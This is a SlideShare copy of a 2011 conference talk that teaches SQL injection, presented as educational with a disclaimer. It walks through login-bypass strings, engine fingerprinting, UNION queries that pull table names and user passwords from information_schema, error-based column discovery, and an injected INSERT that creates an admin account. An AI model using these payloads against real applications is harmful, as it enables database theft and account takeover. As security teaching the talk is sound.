SlideShare a Scribd company logo

How did i steal your database CSCamp2011

Download as PPTX, PDF
Mostafa Siraj
Mostafa Siraj

This document discusses how SQL injection attacks can be used to steal database information. It begins by providing background on databases and SQL queries. It then explains how SQL injection works by altering existing SQL commands. Several examples are given of SQL injection attacks, like exploiting unvalidated login forms. The document outlines a step-by-step strategy an attacker could use to extract metadata and data from a database using SQL injection, including getting the database type and table/column names. It concludes by demonstrating how an attacker could use the extracted information to add an administrative account.

1 of 72
How Did I Steal Your Database Mostafa Siraj Application Security Expert
DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
Nearly all applications rely on a Datastore
What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
Injection in Search Fields 35
Entering Normal Input
Search Results
Trying Single Quote
I receive this error Error states that it’s
Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
I’m having an error, it’s not
Is it Note: string concatenation in Oracle is ||
Different error, still not
Is it Note: string concatenation in MySQL is blank space
It’s
The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
1. Get number of items after the SELECT statement
Error
Try another number
Result Why the results are less?
Try another number
Error, it’s not 8
Let’s try 7
Result How many columns do we have in the SELECT statement
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result
Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Injection with errors
Gives me an Error
Getting version ' and 1 in (SELECT @@version)--
Gives me this error
Getting Column names
I get this Error
Getting next column name ' group by login.firstname having 1=1--
I get this error
Again ' group by login.firstname, login.surname having 1=1--
Error reveals new column name
Again ' group by login.firstname, login.surname,login.username having 1=1--
New column name
Continue…
Continue…
Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
Not all Injections generate errors
DEMOSQLMap
You Were GREAT Audience
Thank You @mostafasiraj Mostafa Siraj

Recommended

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with R
Fayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commands
Balqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1
InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql alias
Vivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basic
wali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and Algorithms
Svetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query Throwdown
Karwin Software Solutions LLC
 

Recommended

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with R
Fayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commands
Balqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1
InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql alias
Vivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basic
wali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and Algorithms
Svetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query Throwdown
Karwin Software Solutions LLC
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
michelemanzotti
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methods
JayanthiNeelampalli
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databases
Triad Square InfoSec
 
Creating a database
Creating a databaseCreating a database
Creating a database
Rahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
nonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
Chema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Edureka!
 
บทที่4
บทที่4บทที่4
บทที่4
Waritsara Sonchan
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHP
hamsa nandhini
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
Mahesh Gupta (DBATAG) - SQL Server Consultant
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
AMol NAik
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECS
Uptech
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
gaurav koriya
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09
sasa_eldoby
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
Atsushi Odagiri
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
Apachepoitutorial
Srikrishna k
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-c
Dhirendra Chauhan
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configuration
Mehdi jannati
 
Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdf
TamiratDejene1
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1
iccma
 

More Related Content

What's hot

Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
michelemanzotti
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methods
JayanthiNeelampalli
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databases
Triad Square InfoSec
 
Creating a database
Creating a databaseCreating a database
Creating a database
Rahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
nonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
Chema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Edureka!
 
บทที่4
บทที่4บทที่4
บทที่4
Waritsara Sonchan
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHP
hamsa nandhini
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
Mahesh Gupta (DBATAG) - SQL Server Consultant
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
AMol NAik
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECS
Uptech
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
gaurav koriya
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09
sasa_eldoby
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
Atsushi Odagiri
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
Apachepoitutorial
Srikrishna k
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-c
Dhirendra Chauhan
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configuration
Mehdi jannati
 

What's hot (20)

Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methods
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databases
 
Creating a database
Creating a databaseCreating a database
Creating a database
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
 
บทที่4
บทที่4บทที่4
บทที่4
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHP
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECS
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
Apachepoitutorial
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-c
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configuration
 

Similar to How did i steal your database CSCamp2011

Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdf
TamiratDejene1
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1
iccma
 
Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1
Syed Asrarali
 
Oracle notes
Oracle notesOracle notes
Oracle notes
Prashant Dadmode
 
Sql injection
Sql injectionSql injection
Sql injection
Nikunj Dhameliya
 
Hira
HiraHira
Hira
hira elahi
 
Sql injection
Sql injectionSql injection
Sql injection
Mehul Boghra
 
Oracle Notes
Oracle NotesOracle Notes
Oracle Notes
Abhishek Sharma
 
My SQL Skills Killed the Server
My SQL Skills Killed the ServerMy SQL Skills Killed the Server
My SQL Skills Killed the Server
devObjective
 
Sql killedserver
Sql killedserverSql killedserver
Sql killedserver
ColdFusionConference
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
Aung Khant
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
hameedkhan2017
 
98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt
HastavaramDineshKuma
 
Introduction to database
Introduction to databaseIntroduction to database
Introduction to database
Pongsakorn U-chupala
 
Dbms sql-final
Dbms sql-finalDbms sql-final
Dbms sql-final
NV Chandra Sekhar Nittala
 
Sql Basics | Edureka
Sql Basics | EdurekaSql Basics | Edureka
Sql Basics | Edureka
Edureka!
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standards
Alessandro Baratella
 
Advanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxAdvanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptx
EllenGracePorras
 

Similar to How did i steal your database CSCamp2011 (20)

Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdf
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1
 
Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1
 
Oracle notes
Oracle notesOracle notes
Oracle notes
 
Sql injection
Sql injectionSql injection
Sql injection
 
Hira
HiraHira
Hira
 
Sql injection
Sql injectionSql injection
Sql injection
 
Oracle Notes
Oracle NotesOracle Notes
Oracle Notes
 
My SQL Skills Killed the Server
My SQL Skills Killed the ServerMy SQL Skills Killed the Server
My SQL Skills Killed the Server
 
Sql killedserver
Sql killedserverSql killedserver
Sql killedserver
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
 
98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt
 
Introduction to database
Introduction to databaseIntroduction to database
Introduction to database
 
Dbms sql-final
Dbms sql-finalDbms sql-final
Dbms sql-final
 
Sql Basics | Edureka
Sql Basics | EdurekaSql Basics | Edureka
Sql Basics | Edureka
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standards
 
Advanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxAdvanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptx
 

Recently uploaded

HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
Zilliz
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Speck&Tech
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 

Recently uploaded (20)

HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 

How did i steal your database CSCamp2011

  • 1. How Did I Steal Your Database Mostafa Siraj Application Security Expert
  • 2. DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
  • 3. Nearly all applications rely on a Datastore
  • 4. What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
  • 5. What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
  • 6. SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
